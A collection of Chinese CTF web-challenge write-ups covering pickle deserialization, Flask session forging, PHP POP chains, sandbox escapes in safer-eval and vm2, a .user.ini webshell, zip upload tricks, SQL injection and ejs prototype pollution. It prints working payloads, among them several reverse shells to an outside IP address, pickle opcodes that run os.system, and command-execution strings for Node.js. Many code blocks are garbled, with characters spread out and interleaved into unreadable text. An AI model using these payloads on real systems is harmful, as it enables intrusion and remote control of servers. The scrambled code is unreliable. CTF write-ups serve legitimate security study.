i i f i i a a @ d @ d i m m r m m p p a e a e f p p o p p p p p f p f o o m o o . p p r r r r = c . h i r . a i e _ a t t f t t o r e f e r d f l n p l F n o l t o m s a p b p a o r l f u l n u u i s e m . a i s s a a i t o o s r t n e r : t e e r s c k n s g e _ t e n e ( s e r x _ u e k d k [ ( w s ( ) s t y c _ n 6 l i o ( ' ' s s ' ' : i u : e ( 4 e m m _ S r e i H / o r a i p r p r = h p _ E l s o e a n n f i e t e = o o n C d s n l d . = c t : t s r a R ( i [ l m g f b k u u t t m E ) o ' o i e " b ' r l r r = e T : n u n t < a R a e n n _ ' F _ _ . s { ' ( s s ' i . m 0 l _ K g e } ) ' c e s l " " a . a ) E e r ! u r 6 i e o o e i 0 s Y t ' ' s i 4 n a k r n . k ' ( ] . e p . p d " r _ 0 , ] ' f r t b a i s o _ . u = o ' > 6 c ( r ' 0 s = s r ) a 4 o k b ! : ' e e m l d r l a " , s o r a ! e e e s s s ' . t = r c b . e p i . ) j ( t o ' U 6 o o u : o s " ( d i n 4 r n r i e a ' e ' p . t a n s d A ( i b = n ( s m c s i c 6 8 d r i i c e n k 4 8 o a o n e s l d 8 m n n " s s a i e 8 ( d [ : s i n c ) 2 o ' o o g o ) m u D n r E d . . s e . r e h c e n g b r ( e h r i e ' o s x o ' e t o r e ( i ] d ( ' ( s ) c ) ' ' " s e ) s i R i s ; e n o ( w r i n " i _ a . a n d g d d a o e m o t r b t i w a ( n . ' b i ' " l ) ' s s , o ) b e c . ' f r k a r o _ = t e i r d 5 i p n b a ) o l i t ) n a a d a . c : d ' h e e ) r ( n ) e b " ) f " ) = b # ' u / i ' l < t / i s n c " r , i p b t " > B " u I l t I n " ) . r e p l a c e ( b " o s " , b " O s " ) . r e p l a c e ( b " b y t e s " , b " B y t e s " )

第一眼看到的是pickle.loads函数,反序列化输入字符,然后是app.config['SECRET_KEY'] = os.urandom(2).hex()可能要session伪造

先看session的密钥生成逻辑

a p p . c o n f i g [ ' S E C R E T _ K E Y ' ] = o s . u r a n d o m ( 2 ) . h e x ( )

一个随机数字,两个字符的hex

# w p i r t i h n f t o o ( p r " e n i h f ( e . " i x w h n _ r e s i x r t t _ a r e d n ( i g = h c e e h t ( f x e . 0 ' _ x t x " s _ x 1 { t d t 0 i r i " 0 : c , 0 0 + t 0 4 . " ) x " t w : } \ x " " n t ) ' " " # ) ) a s 0 x f 1 : 0 0 0 0 = 6 5 5 3 6

爆破可得

n [ [ [ ' e * * + d k ] ] ] 6 o 1 @ S S F 8 a e t o ' o s a u s s r n c i t d - o i n n n s e g e k d c o e b r 2 c r e 0 o u t 5 d t e e k [ s - e f y f t o u o r a z : c f z e t D { r e i ' r c u w t s i 5 s e t 4 @ r h 9 m ' 1 a : 8 2 s t ' t a e n h t r d r t a e e ] a a m m d p $ ' s t } . s f . l a s k - u n s i g n - u n s i g n - c o o k i e " e y J 1 c 2 V y I j o i b m R h Y W 0 i f Q . Z 9 a I m g . 6 P z I A A 8 J O 6 - a x 3 h P 7 w g K V g g t 0 p 4 " - w o r d l i s t h e x _ d i c t . t x t

接下来就是反序列化,看下逻辑

t r y : e x c e a i p r p r f i e t e = c t : t b k u u b ' r l r r a R a e n n s ' i . e s l " " 6 i e o o e 4 n a k r . p d " r b a i s o 6 c ( r 4 o k b ! d r l a " e e s c b . e o ' U 6 d i n 4 e ' p . ( i b s i c 6 e n k 4 s l d s a i e i n c o o g o n r E d . r e g b r ( e ' o s t o r e ( ' ( s ' " s s i R i e n o r i n _ a . d g a o e t r b t a ( ' b i ' ) ' s s ) b e . ' f r r o _ e i r d p n b a l i t a a d a c : d ' e e ) ( n ) b " ) " ) b u i l t i n " , b " B u I l t I n " ) . r e p l a c e ( b " o s " , b " O s " ) . r e p l a c e ( b " b y t e s " , b " B y t e s " )

不算复杂,从session中获取ser_data将其中的builtin替换为Builtinos替换为Osbytes替换为Bytes

payload

先不管绕过,先做payload,因为没有回显只能使用反弹shell来完成连接

{ ' u s e r ' : ' a d m i n ' , ' s e r _ d a t a ' : ' Y 3 B v c 2 l 4 C n N 5 c 3 R l b Q p w M A o o V n N o I C 1 p I D 4 m I C 9 k Z X Y v d G N w L z Q 1 L j E 5 M i 4 x M T A u M j Q v O T A w M S A w P i Y x C n A x C n R w M g p S c D M K L g = = ' }
1 1 1 6 6 6 6 6 7 0 4 7 8 1 4 5 8 9 2 : : : : : : : : : : c p ( V p t p R p . G P M P R P S L U A U E U T O T R T D T O B K U P A U P T C L N U U E I T P C L O E D E ' 0 2 3 p o s i ' 1 ( x s M h A s R y - K s i t a e > t m & ' 1 / 7 d ) e v / t c p / 1 . 1 . 1 . 1 / 9 0 0 1 0 > & 1 '

打进去后显示是error,debug下发现,会触发waf,尝试了很久都没有绕过,后续查wp他用的opcode是手动构建的,着实有点超纲

1 1 2 2 3 4 4 4 0 1 9 7 8 5 6 7 3 4 5 : : : : : : : : : : : ( S S d S ( c V s . b ' ' ' M S M S S ( A T A E T S R R R T O ' K I K I P k S S D N G U O T e T T I G L N B E y R R C O I J M 1 I I T B C ' N N A O \ G G L D n E S ' v v u a l l ' ( ' ' ( 1 k v M o c M ' e a A s a A \ y l R l R n 1 1 K s c K d ' ' y ' S a s a ' t t t v e u 0 m 2 l ) ' 5 ' ) \ n ( c o s \ n s y s t e m \ n V c a l c \ n o s . ' ' '

成功绕过,之后使用反弹shell,应为需要使用到-i可以使用unicode编码

b ' ' ' ( S ' k e y 1 ' \ n S ' v a l 1 ' \ n d S ' v u l ' \ n ( c o s \ n s y s t e m \ n V \ u 0 0 7 3 \ u 0 0 6 8 \ u 0 0 2 0 \ u 0 0 2 d \ u 0 0 6 9 \ u 0 0 2 0 \ u 0 0 3 e \ u 0 0 2 6 \ u 0 0 2 0 \ u 0 0 2 f \ u 0 0 6 4 \ u 0 0 6 5 \ u 0 0 7 6 \ u 0 0 2 f \ u 0 0 7 4 \ u 0 0 6 3 \ u 0 0 7 0 \ u 0 0 2 f \ u 0 0 3 4 \ u 0 0 3 5 \ u 0 0 2 e \ u 0 0 3 1 \ u 0 0 3 9 \ u 0 0 3 2 \ u 0 0 2 e \ u 0 0 3 1 \ u 0 0 3 1 \ u 0 0 3 0 \ u 0 0 2 e \ u 0 0 3 2 \ u 0 0 3 4 \ u 0 0 2 f \ u 0 0 3 9 \ u 0 0 3 0 \ u 0 0 3 0 \ u 0 0 3 1 \ u 0 0 2 0 \ u 0 0 3 0 \ u 0 0 3 e \ u 0 0 2 6 \ u 0 0 3 1 \ n o s . ' ' '

base64编码,写入session,打出去就可以

这里有个天坑这个靶机sh走不了伪设备,需要再套一层bash也就是

b a s h - c ' s h - i > & / d e v / t c p / 4 5 . 1 9 2 . 1 1 0 . 2 4 / 9 0 0 1 0 > & 1 '

处理成unicode编码即可

[HZNUCTF 2023 preliminary]pickle

又是一道反序列化,先看代码

i i f a @ d @ d @ d i m m r p a e a e a e f p p o p p f p f p f o o m p p p r r = . i w . g p p r . r f w _ a t t f r n i r e a i e r e i i n p l F o d t o t y c t o a l t a p b p a l u e h u F l k u u d e h m . a i s a t x r t l o l r t F n r e r s c k s e ( o e e a a e n e i a o e _ u e k k ( ) p t ( g d . ( l m p t _ n 6 l i ( ' : e u ' ( l " ' e e e u ( 4 e m _ / n r / ) = o g / ( n r = h p _ ' ( n c : a a r ) = ( n = o o n ) ' a r d n e : f s r a a f l e s b a r i f t t m p . c q ( a d e l . = e p r ' u b d F q e r _ ' F _ . e , e a i i u n e m 0 l _ p a s s e l e a a a . a ) y d m t e ! e s m d i 0 s ' ( e . 6 " ' t e ( n . k , ) t a 4 , . , ) _ 0 , h r . # a _ . ' o g b m r ' ' 0 r r d s 6 e g r : ' e ' s . 4 t s ' ) q ) = g d h . ) u [ e e o g e a ' t c d e a s s G ( o s t s t E " d = ( f T p e [ ' f : ' a ( ' f : ] y p G i ) l a E l # o y T e a l ' n d o ] a " a ) m f ) d e l ) ' a . ) g r . e r p e l p a l c a e c ( e b ( ' " o f s l ' a , g " b , ' ' " ) ? ) ? ? ? " )

一个函数是任意文件读取,一个函数是反序列化

p i c k l e . l o a d s ( b a s e 6 4 . b 6 4 d e c o d e ( p a y l o a d ) . r e p l a c e ( b ' o s ' , b ' ' ) )

过滤了os

可以通过eval来绕过,将执行结果传入文件再读取

i i c a p p m m l r r p p a = i i o o s n n r r s d r t t t t e a ( ( r f y p b p b a i i a i a y r ( c s c s i _ e ) k e k e ( r t l 6 l 6 o e u e 4 e 4 b d r . . j u n d b e c u 6 c e e m 4 t _ v p e ) _ a s n : ( l ( c s , a o e ) d l ( ) e f " ( ) _ p : _ i i c m k p l o e r . t d _ u _ m ( p ' s o ( ' a + ) ' ) s ) ' ) . s y s t e m ( ' e n v | t e e a ' ) " , )

[SWPUCTF 2022 新生赛]ez_1zpop

php反序列化

< e c { } c { } c { } i } } ? r l l l f p r a a a e h o s s s ( l p r s f { } s p p p f { } f { } f { } f { } s p p p f { } i $ s _ u u u u u u u u u u u u s D e r d n l b b b n n n n f b b b n s a e x c t l l l c c c c i l l l c e t { p g t r i i i t $ t $ r t i t e n i i i t $ $ t a o i e c c c i t i t e i f i c c c c i b b ( r o t o h o h t o o h o ( $ = t n u $ $ $ n i n i u n ( n o $ $ $ n = $ _ i r i m m s s r i r a u t t G u n f n m d d - - n s e $ ; r i f $ h E n g m p 5 5 _ > _ > _ s t _ t l t m t i T s ( m " o 1 2 c i w i $ t e u d h l m h s [ e 0 ( n = = = o m a m t o t r e i = e ( i - ' r ) ) o ' ; ; n p k p h S ( n s s ; ) s > N i ; n h s o e o i t $ t ; ' - t S a o i t u s r t $ r h # > i S l n ' r = p = - i h t u # t a t ' i o ; u ( > n i h c t ; l ] z " c n ) n i g s i t p e ) e ; t e e m ( - s ( s ) ) ( ( w # w p ) > - ) _ : ; $ ) o i > _ / { _ d d - # m i # t / G # x x > p m o w E g g f o p S w T ; ; m ) o t w [ m - r . ' # ( & > i c N ) & f n t S ; m g f S m m ( e ' d ( ) r ] 5 ) . ) ( ; v ; $ i 访 t # p h ' i ; s f - m > m m d 5 1 ) = = m d 5 ( $ t h i s - > m d 5 2 ) & & $ t h i s - > m d 5 1 ! = $ t h i s - > m d 5 2 )

出口位于 fin class的 fmm函数,需要控制$btitle

真正的入口位于__destruct(),在这里触发toString修改变量使用0x绕过md5判断,修改impo指向fmm完成调用

[西湖论剑 2022]Node Magical Login

源代码:https://github.com/CTF-Archives/2022-xhlj-web-node_magical_login

main关键点

a } a } a } p ) p ) p ) p p p . . . g c g c p c e o e o o o t n t n s n ( t ( t t t " r " r ( r / o / o " f l f l l l l l l g l a e a e e e g r g r t r 1 . 2 . f . " F " C l C , l , h a h ( a ( e g e r g r c 2 c e 1 e k " k q C q I , C , o , n ( o r n r t r n e t e e e t s r s r q r ) o ) n , o l a r l = l = l e l > e > C s e r o ) r { ( { n = ( r t > r e r e q o { q , l , r l r e e e s r s ) ( ) r e q , r e s )

对应的代码

f } u n c t t } i r c o y a n t { i } i } } c F f f e h l ( ( l a r r s g e r r r e r r e r 1 q e e e q e e { e C . s s s . s s s o c . . . c . . . n o s s s o s s s { t o e e t o e t t } r k t t a k t a a o i H H t i H t t l e e e u e e u u l s a a s s a s s e . d d ( . d ( ( r u e e 2 u e 2 4 ( s r r 0 s r 0 0 r e ( ( 0 e ( 0 1 e r " " ) r " ) ) q T T . T . . , = h h t = h t t r = i i y = i y y e = s s p = s p p s _ _ e _ e e ) S I I ( " I ( ( { E s s " a s " " C _ _ t d _ t t R T T e m T e e E h h x i h x x T e e t n e t t _ _ _ / " _ / / C F F h ) F h h O l l t l t t O a a m { a m m K g g l g l l I 1 2 " 1 " " E " " ) " ) ) ) , , . , . . { f f s s s l l e f e e a a n l n n g g d a d d 1 2 ( g ( ( . . " 1 " " t t L . Y U o o o t o n S S g o u a t t i S u r r n t G t i i r o h n n s i t o g g u n r ( ( c g O i ) ) c ( n z . . e ) e e t t s . d r r s t P " i i . r a ) m m i r ( ( W m t ) ) e ( ) ) l ) O c ) f o m F e l , a a g d ! m i T n r ! y " ) T o G e t A n o t h e r P a r t o f F l a g ! " )

flag2

f } u n c t l c i } } i e o f e o t n ( l n s c s c o h t } r e r C h l e r c e { e h e e c y a s s e c . k { t . . c k l c c i } c s s k c o o h f h t t C o g d e ( a a o d ( e c c t t n e r . k h r u u t e l c e e s s r = q e o c s ( ( o . n d k . 2 4 l r b g e c s { 0 0 l e o t o t } 0 3 e q d h = d a ) ) r . y e t . . ( b ) = c u t t r o = h ! s y y e d = e = ( p p q y c = 4 e e , . 1 k 0 ( ( r c 6 c " 3 " " e h ) o a ) t t s e { d G . e e ) c e r j x x k . 5 s t t { c t A o / / o o t n h h d L S ( t t e o p { m m ? w 5 " l l r e 5 m " " e r d s ) ) q C R g . . . a a " j j b s c : s s o e e " o o d ( r I n n y ) " n ( ( . ) v { { c { a " " h l m m e i s s c d g g k " " c C : : o h " " d e Y I e c o n : k u v 1 c a 2 o G l 3 d o i 4 e t d ; 1 : A C " n h o e + t c h k c e c h r o e d c P e k a 2 c r : o t " d e O + } f ) c F h l e a c g k : c o " d e + } ) f l a g 2 . t o S t r i n g ( ) . t r i m ( ) } )

先看flag1关键点是

r e q . c o o k i e s . u s e r = = = " a d m i n "

获得一半的flagNSSCTF{ac7516ed-eb81

在看flag2的代码,如果想要触发则需要使得

c h e c k c o d e = c h e c k c o d e . t o L o w e r C a s e ( )

发生错误,从而触发catch (__) {}代码块,可以构造数组来触发错误

P H U C O A A A R C { } O o s o r c c c e o S s e n i c c c f n " T t r t g e e e e t c : - e i p p p r e h / A n n t t t e n e g n g t : - : - r t c e o e - E L : - k t d n T h n a L c f e t y t c n h e o l 4 : p t g t n d a . e p d u t g e g a M : : i a p t " 2 n o / n g : h : n z a / g e / : H a i p n : : / [ T . l p o n 1 1 T n l l d g z o 7 , P s a i e z h d 2 / s / c 4 i - e , 1 c 5 a . p C 4 3 . t . t a , N . , 1 f 0 i n , a 4 . o n d z n , c ( n a e h n 5 n X / . f ; a , : 1 j n l q . 6 2 1 s s a = n , 8 ; o s t 0 s 7 2 n c e . s , 3 L t 9 c 8 8 i f t , n . f 9 u c . , x n c 1 : n 0 x 2 : , 8 8 2 1 6 2 8 1 _ 3 2 , 6 8 3 1 4 8 2 ) / , f 1 A l 3 p a , p g 1 l 2 4 e , W 1 e 5 b , K 1 i 6 t ] / 5 3 7 . 3 6 ( K H T M L , l i k e G e c k o ) C h r o m e / 1 3 4 . 0 . 0 . 0 S a f a r i / 5 3 7 . 3 6

flag

N S S C T F { a c 7 5 1 6 e d - e b 8 1 - 4 e 8 b - 8 a e 2 - 0 a c 3 4 0 c b d e 7 9 }

[suctf 2019]checkin

全新知识点

当上传图片的时候可以看到回显了两个内容,是上传的目录文件,存在一个我们上传的文件和一个php文件

可以使用.user.ini+图片马来构建一句话木马,先上传ini

G a I u F t 8 o 9 _ a p r e p e n d _ f i l e = s h e l l . j p g

在上传图片马

< s c r i p t l a n g u a g e = " p h p " > s y s t e m ( ' c a t / f l a g ' ) ; < / s c r i p t >

[GKCTF 2020]ez三剑客-easynode

safer-eval漏洞

先看代码

c c c c c a a a } a } a } a } a } a } o o o o o p p p ) p ) p ) p ) p ) p ) n n n n n p p p ; p ; p ; p ; p p ; s s s s s . . . . . . . . t t t t t u u u i } } p l i } r g r r g r r g r r l c s s s f o e f e e e e e e e e e e i o e b s f a e e e e s t s t s s t s s t s s s n x o a s p ( ( ( ( l t ( . ( . . ( . . ( . . t s p d f p b b ( r l c i } c s } s n ( r r t } } s ' s s ' s s ' s s e o r y e = o o r e e o f o e , e e ' e e r e / e e / e e / e e n l e P r = d d e q t n n t x / s q y c n s t n v t n ' t n ( e s a E r y y q . s ( s T 1 { t e p . a d o ( d e ( d , ( d 8 . s r v e e P P , p d o N d t i 0 ( v o b { r t r ( u ' ( r ' ( ' ( 0 l s a q x a a a e l u e m 0 ) a n o e c e S r C f s C f f C f , o = e l u p r r r t l e m l t e 0 ; l s d s h s t c o s i o s u o s g r i r s s e h a . b a o ) ' e y p p r e n . o n . n n . ' ( r = r e e e s y l e y = u ; , . o ( o i ' t r n t r c t r 0 ' e = e s r r , = o r t = e n e n n , e e ' e e t e e . S q r ( s . . = = g . = s ( f ) s ) s g n a , n a i n a 0 t u r e ' ( u j n = ( i e ( u e e ( f t d t d o t d . a i e q f ) r s e 6 d s M t ) n ' { { r u - F f - F n - F 0 r r q u s ; l o x 0 e I a T c ; = = e n T i u T i T i . t e u i ' e n t / l n t i = t s c y l n y l ( y l 0 ( i r ) n ( ) e a t h m > i s ' p t p e c p e r p e ' l ' r e ; c ) v y e . e o a W o i e S t e S e e S , i e e ( o ) = a 1 ) g m o { n f r n o ' y i ' y q ' y s x ( ' d ; > l 0 ; e a u c e o s n , n o , n , , n t p ' s e ' 0 r x t l ( r n e c n c c e r b a d { ) 0 ( ( ( e r E g ) ( ' ( ' ( r ' ( n e o f ( ; p d ( a e v ) r t ' ( t ' e t ' = i s d e { { a e ) r q a W ; e e . r e . s e . > n s y r r l T , l r q x / e x / ) x / g ' - - e s a = i ( o , t i q t p t i { ' ) p e x e y > m r r n / n , / a { / n ) ; a v t I , e e e g r j d j c h d r a e n n o s q e a e r s k t e s l n t p e u ) . W s v x e o a m x e ' d ( a x t b r ) a . s n g l . r ) e r r t ( { o o s j ) ; e ; h ' ; d e s ( t d n { c s c . c t ) : q e ) ) y g r ' { h j h m ; . I , ; . ! i ) a s a l f q n c e ! p ) r o r ' a u t d o ) ! t ; s n s ) l e ( e n ; ! ; e ' e ) s r r l s ' c t ) t e y e a o ; h = ) = . q y l a u ; u } d . ) e r t t ) e q ; . s f f ) l u l e - - ; a e o t 8 8 y r g = ' ' ) y ( u ) ) ) . ' t ; ; ) d t f e i - { l m 8 a e ' y o ) ) u ; ) t ; ' ) ; t r y { r e s . s e n d ( ' T i m e o u t ! ' ) ; } c a t c h ( e ) { }

两个关键点

a } a } p ) p ) p ; p ; . . u i } } p l i } r s f o e f e e e s t s ( ( l t ( . ( r l c i } c s } s n ( r r t } } s r e e o f o e , e e ' e e r e e q t n n t x / s q y c n q . s ( s T 1 { t e p . a d , p d o N d t i 0 ( v o b { r t r ( a e l u e m 0 ) a n o e c e S r t l e m l t e 0 ; l s d s h s t e h a . b a o ) ' e y p p r s y l e y = u ; , . o ( o i , = o r t = e n e n n = = g . = s ( f ) s ) s g n = ( i e ( u e e ( e 6 d s M t ) n ' { { r x 0 e I a T c ; = = e t / l n t i = t s ) e a t h m > i s ' p v y e . e o a W o = a 1 ) g m o { n f r n > l 0 ; e a u c e o s ' 0 r x t l ( r n e { ) 0 ( ( ( e r E g ) ; p d ( a e v ) { a e ) r q a W ; r l T , l r s a = i ( o e y > m r r n I , e e e g n n o s q t p e u ) . W ( a x t b r r r t ( { o o e s ( t d n q e ) ) y g . I , ; . ! q n c e ! u t d o ) ! e ( e n ; ! r r l s ' y e a o ; . q y l d . ) e e q ; . l u l a e o y r g ) y ( ) . ' ) d t e i { l m a e y o ) u ) t ; ' ) ; t r y { r e s . s e n d ( ' T i m e o u t ! ' ) ; } c a t c h ( e ) { }

这里有一个新的知识点,setTime溢出绕过,因为底层使用的是32位的有符号整数所以最大值是2147483647

如果传入2147483648则会导致setTime溢出立刻执行

回到eva路由

r e s p o n s e = s a f e r E v a l ( r e q . b o d y . e ) ;

这里用到的库存在沙箱逃逸,可以使用

( c r f o e u n t n s u c t r t n i p o r p n o r c o e c s e s s { s = . m c a l i e n a M r o I d m u m l e e d . i r a e t q e u . i c r o e n ( s " t c r h u i c l t d o _ r p ( r " o r c e e t s u s r " n ) . p e r x o e c c e S s y s n ; c " ( ) " ( c ) a ; t / f l a g " ) . t o S t r i n g ( ) } ) ( )

来完成逃逸

[HZNUCTF 2023 final]eznode

vm2沙箱逃逸

c c c a c } c c } c } a } a } a } o o o p o o o o p ) p ) p ) n n n p n n n n p ; p p ; s s s . s s s s . . . t t t u t t } } t t f } r t r g r p t } } l c s r o e e e e o r c i o e a { e b y c i m r t c t t s s y a s n x p ( a a s e u l u ( . t t t s p p V e c { n t c O r i } } r o r ' s ( { c v v i } r c r c e o r M x k e c o b g v f n n n / e ' o a a f e h e o n l e = p d w h n j e a e e ' n / n r r s ( s n ( e s } r o s e r ( l a m , d ' s ( . e . s 3 . s e e o V ( o c = i m s a = e ( , o b c c b s ) s o 0 l x = s r M e l t a s e e [ r f " l o o o a e { e l 0 o = p s ( ) e ( t O r a ( g u P f e d p p c n n e 0 g r r . = ) . = a t b g { t a e n O u . y y y k d d . , ( r e e j . { l , r j e t ) ( c S n l b b d ( ( l ' e s q s f r o o e ( r { t T c o = o o o " " o f s q s u o u u g b b i c a ] = } i t g d d o p i g u t u ( i n n n ( j ) n t [ > , o s i ( J y y r o s ( n a i ) r ( c ( e ( a = n o o r S . ( s e c r r ; e ) t { ) = = b a t { a m n e O = s ) t i ) t t e ( ) i } ; > > ) [ t b ) ( e q N h t i ( ' ; o . a r [ ; r ( . . c i s o l ' v n s o { { t ] a e j r b p l t h s n i e m h b t , t q s e o a o ) i h s x 2 e j r t , o q d r n t i t p ' l ] b r n , y s e { t e r ) l & ) [ ] r ) e ( o n e ; { c & a ; e s r ( b k ? { i s o & t s h e J o " " n s d o & t ) i s S d ) ) g ' e b r t ) O y ) ) j i ] { N ) o ; ; . s ) t { . n c O ; o s o b t p n j r o s e i r t c n t r t g u ( n i 3 c b o f 0 t [ y 0 o a s ( 0 r t o r ' t u e ) & r r q ; & ] c . ) e b o ) o b c d j { o y . d ) c e ) o ; n a s n t d r u t c r t y o r t o = = f = i n O d b j s e o c u t r ; c e c o d e " ) ;

可以看到一个非常直球的merge函数,和backdoor函数,运行原型链污染后的代码

n e w V M ( ) . r u n ( { } . s h e l l c o d e ) ;

关键在vm2的绕过,详细可以看https://xz.aliyun.com/news/11305

{ " s h i t " : 1 , " _ _ p r o t o _ _ " : { " s h e l l c o d e " : " l e t r e s = i m p o r t ( ' . / a p p . j s ' ) ; r e s . t o S t r i n g . c o n s t r u c t o r ( \ " r e t u r n t h i s \ " ) . p r o c e s s . m a i n M o d u l e . r e q u i r e ( \ " c h i l d _ p r o c e s s \ " ) . e x e c S y n c ( ' b a s h - c \ " b a s h - i > & / d e v / t c p / 4 5 . 1 9 2 . 1 1 0 . 2 4 / 9 9 8 2 0 > & 1 \ " ' ) . t o S t r i n g ( ) ; " } }

然后注意需要存在shit,Content-Type: application/json

pass

[鹏城杯 2022]压缩包

先看代码

< h f } f $ s $ f e ? ? i u u c h f i c > p g n n o e p l h h h c c n l a e o p l t $ f } t } t l t c _ i i l o Z i e / _ h o p u g i r I o n t e n u n h n s e i } } P n t m x = t t z t t a f e $ $ $ $ i } i f } $ u r } } = p e " e _ i _ r = c ( u l u r z z d f f o z n e e c / n c p f e h i n s n e i i i ( ( r i l t l $ ( t t o ( i m s s l e z s p p r ! $ e p i u s _ ' m n $ l o c ( _ i i u - i m z a $ $ $ $ i } i } - n r e r R r / p t f e v a $ f n . i p l = > = s k i c f f f f f f > k n { e E m t / b e p ( e n l i k f ( t o _ d p h i i i i ( ( c ( t Q m " a n a _ d d i l ( ( $ n p $ d i - l l l l i ! l $ j u U - p . s t t _ i / i s e $ $ r f = e e _ i r > ( e e e e s r p i } } o f s r E r m e s h F r r t ( d v e i w n S r ( e s _ _ _ _ _ e r f e s i o n S f m d 6 ( ) I ( ( $ i a m l [ ( E ( $ x c e e e e d m e ( l e l n T d 5 4 $ ; L $ $ a d r l o e ] Z $ R $ d t a x x x x i o g i s ( e _ f [ / 5 ( f E d d s i . u v n ; i f V d i r n t t t t r v _ s u e i a ) n e a ' t ( $ p _ i i r ' e e a p i E i r a d = = = = ( e m _ n { f r ; a n l c m c c a _ r r . ! d m A l R r ) c i s s s t $ d a f l ( r m c s o p o o t ) ) ) $ ' = i e r e [ ) ; t r t t t r d i t i i $ a e o e n / n n h ; { ; v . " r ) c n ' ) T ( r r r i i r c l n v y ) d ; t * t t , a $ . ( { h a D { o $ r t _ m r ( h e k a _ ; e e ' e e l . v " $ i m O ( d c o i ( . $ ( ( ( l p ( n ) n n b u $ a & d v e C $ i h l r $ " d " $ $ u u $ t ; t t a e v l & i e ) U d r r o e f / i / d d e s r ' ) ) s ) a u $ r ( ; / M i ) ( w p i " r j i i ! h e ] ; e l e v . ) s E r $ e l l . ) p r r = ( s ; 6 { u ) a ' ; t N ) a v r a e $ ; g . . " $ u 4 e ; l / a T ) s a ( c _ v | " " . r l _ ) u ' t _ { l $ e e a p / / " e t d ) e . i R u f ( x l n " " & s Z ) e { ! $ c O $ e i ' t u g . . & u I ; c = v Z / O v , l : ) e | $ $ $ l P o " a I u T a e : ; ) g v v v t d . l P p ' l _ $ & i a a a , e . u l ] u e D & f l l l $ ( " e o . e x A $ | u u u v $ ) ) a " ) ) t T v j e e e a c { ; d ; ) A a p ) ) ! l o s { ; ' l e ) ; = u n m t , u g { " e c t d a e / . ) o e 5 t ! i . ; n n ( i ' = s " t t c , " " ) e ) / . , n ) u $ " $ t ; ) p f & f l i & i o l $ l a e v e d _ a _ / e l e " x u x . t e t m ) ! ) d ; = ) 5 / " { ( / . $ . f " i ) l N { e T n F a S m e ) ;

可以看到文件是先解压后遍历的一个方式,如果我们在遍历删除前就对其进行访问就可以做到条件竞争。。。理论上是这样的 但我尝试了很久都没有成功,就换了一个方法

失败解压

i f ( $ z i p } } - e > l e s x e r t { e r t a u c r t n T o f ( a $ l d s i e r ; ) ) {

他的解压是套在一个if中的,可以在linux中构建出一个不符合规则的zip压缩包在成功解压木马的时候使得他报错

z r m e z i m k c i p d h p a i o - . r - y p 1 y h a e p . > e x p x p h p . p / . z a z i . i p p p h a p a . / . p 1 p h h p p / 1

没接触过的知识点+1

[GKCTF 2021]easynode

打开是一个登入口,先看代码

app.post('/login',function(req,res,next){

    let username = req.body.username;
    let password = req.body.password;
    safeQuery(username,password).then(
        result =>{
            if(result[0]){
                const token = generateToken(username)
                res.json({
                    "msg":"yes","token":token
                });
            }
            else{
                res.json(
                    {"msg":"username or password wrong"}
                    );
            }
        }
    ).then(close()).catch(err=>{res.json({"msg":"something wrong!"});});
  })
  let safeQuery =  async (username,password)=>{

    const waf = (str)=>{
        // console.log(str);
        blacklist = ['\\','\^',')','(','\"','\'']
        blacklist.forEach(element => {
            if (str == element){
                str = "*";
            }
        });
        return str;
    }

    const safeStr = (str)=>{ for(let i = 0;i < str.length;i++){
        if (waf(str[i]) =="*"){
            
            str =  str.slice(0, i) + "*" + str.slice(i + 1, str.length);
        }
        
    }
    return str;
    }

    username = safeStr(username);
    password = safeStr(password);
    let sql = format("select * from test where username = '{}' and password = '{}'",username.substr(0,20),password.substr(0,20));
    // console.log(sql);
    result = JSON.parse(JSON.stringify(await select(sql)));
    return result;
}

这里要打一个sql注入,但是做了过滤,需要绕过使用单引号闭合

在这里挠头挠了很久,后来在一个wp里看到了这样的解

    let testUsername = ["' or 1 #",")"];
    let testPassword = '123456';

safestr函数会判断数组中两个数值的内容又因为)触发了

str = str.slice(0, i) + "*" + str.slice(i + 1, str.length);

从而绕过了对‘的检查

那么就可以构造

username[]=' or 1 #&username[]=(&password=foo

成功登入,回到代码,可以看到引入使用CVE-2021-2594

var extend = require("js-extend").extend
var addDIV = `{"${username}":{"${key}":"${data[key]}"}}`;
extend(board,JSON.parse(addDIV));

根据代码/adminDIV我们可控的是data的数据,可以ejs原型链污染来完成代码执行,但需要username也可控,他的可控点位于addAdmin函数中

app.post("/addAdmin",async (req,res,next) => {
    let username = req.body.username;
    let password = req.body.password;
    const token = req.cookies.token
    let result = verifyToken(token);
    if (result !='err'){
        gift = JSON.stringify({ [username]:{name:"Blue-Eyes White Dragon",ATK:"3000",DEF:"2500",URL:"https://ftp.bmp.ovh/imgs/2021/06/f66c705bd748e034.jpg"}});
        var sql = format('INSERT INTO test (username, password) VALUES ("{}","{}") ',username,password);
        select(sql).then(close()).catch( (err)=>{console.log(err)}); 
        var sql = format('INSERT INTO board (username, board) VALUES (\'{}\',\'{}\') ',username,gift);
        console.log(sql);
        select(sql).then(close()).catch( (err)=>{console.log(err)});
        res.end('add admin successful!')
    }
    else{
        res.end('stop!!!');
    }
});

创建一个名字为__proto__ 的用户在做污染

{"outputFunctionName":"__tmp1;return global.process.mainModule.constructor._load('child_process').execSync('**/bin/bash -i >& /dev/tcp/45.192./8872 0>&1**'); __tmp2"}

理论上出来了,但nss无动于衷

[SEETF 2023]Express JavaScript Security pbidle

先看给出的附件

index.js

const express = require('express');
const ejs = require('ejs');

const app = express();

app.set('view engine', 'ejs');

const BLACKLIST = [
    "outputFunctionName",
    "escapeFunction",
    "localsName",
    "destructuredLocals"
]

app.get('/', (req, res) => {
    return res.render('index');
});

app.get('/greet', (req, res) => {
    
    const data = JSON.stringify(req.query);

    if (BLACKLIST.find((item) => data.includes(item))) {
        return res.status(400).send('Can you not?');
    }

    return res.render('greet', {
        ...JSON.parse(data),
        cache: false
    });
});

app.listen(3000, () => {
    console.log('Server listening on port 3000')
})

readflag.c

#include <stdio.h>
#include <stdlib.h>

int main()
{
    setuid(0);
    system("/bin/cat /root/flag.txt");
    return 0;
}

DockerFile

FROM node:18-bullseye-slim

RUN apt-get update && \
apt-get install -y dumb-init gcc && \
rm -rf /var/lib/apt/lists/*

RUN addgroup ejs && \
adduser --disabled-password --gecos "" --ingroup ejs ejs

WORKDIR /home/ejs/app
RUN chown -R ejs:ejs .

COPY views ./views
COPY main.js package.json ./

RUN npm install

COPY flag.txt /root/flag.txt

COPY readflag.c /readflag.c
RUN gcc -o /readflag /readflag.c && rm /readflag.c
RUN chmod +rxs /readflag

USER ejs

ENTRYPOINT ["/usr/bin/dumb-init", "--"]
